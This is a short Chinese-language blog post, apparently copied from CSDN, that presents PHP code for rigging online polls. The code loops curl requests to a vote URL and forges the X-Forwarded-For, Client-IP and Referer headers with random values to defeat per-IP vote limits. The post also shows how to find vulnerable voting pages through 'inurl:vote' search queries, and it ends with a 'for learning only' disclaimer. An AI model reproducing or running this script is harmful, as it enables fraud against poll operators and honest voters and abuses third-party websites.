很多网站上的投票依据是ip地址,不同的ip地址一天可投票一次
下面的代码就是利用curl扩展来伪造ip地址 达到无限制投票;
$times = $_POST['times']; //投票次数
$url = $_POST['url']; //投票地址[某个选手下方投票按钮的链接]
while ($times)
{
$ip1 = 'X-FORWARDED-FOR:'.rand(115,225).'.'.rand(115,225).'.'.rand(115,225).'.'.rand(115,225);
$ip2 = 'CLIENT-IP:'.rand(115,225).'.'.rand(115,225).'.'.rand(115,225).'.'.rand(115,225);
$arr = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
$from = "http://www.".$arr[rand(0,25)].".com/";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, array($ip1, $ip2));
curl_setopt($ch, CURLOPT_REFERER, $from);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_exec($ch);
curl_close($ch);
$times--;
}
return ;注意:大部分系统都是可以的,主要是他在检测ip地址的时候并没有检查到真实的地址,但是有些程序员的代码写的比较谨慎的,这种就不行了,
如果你想测试一下这个代码但是又找不到投票系统怎么办,在百度或者谷歌搜索栏中输入 inurl:vote 或者inurl:toupiao 会找到很多,
本文只作学习交流,使用一切后果与本人无关
原文地址:http://blog.csdn.net/jiecooner/article/details/40143253
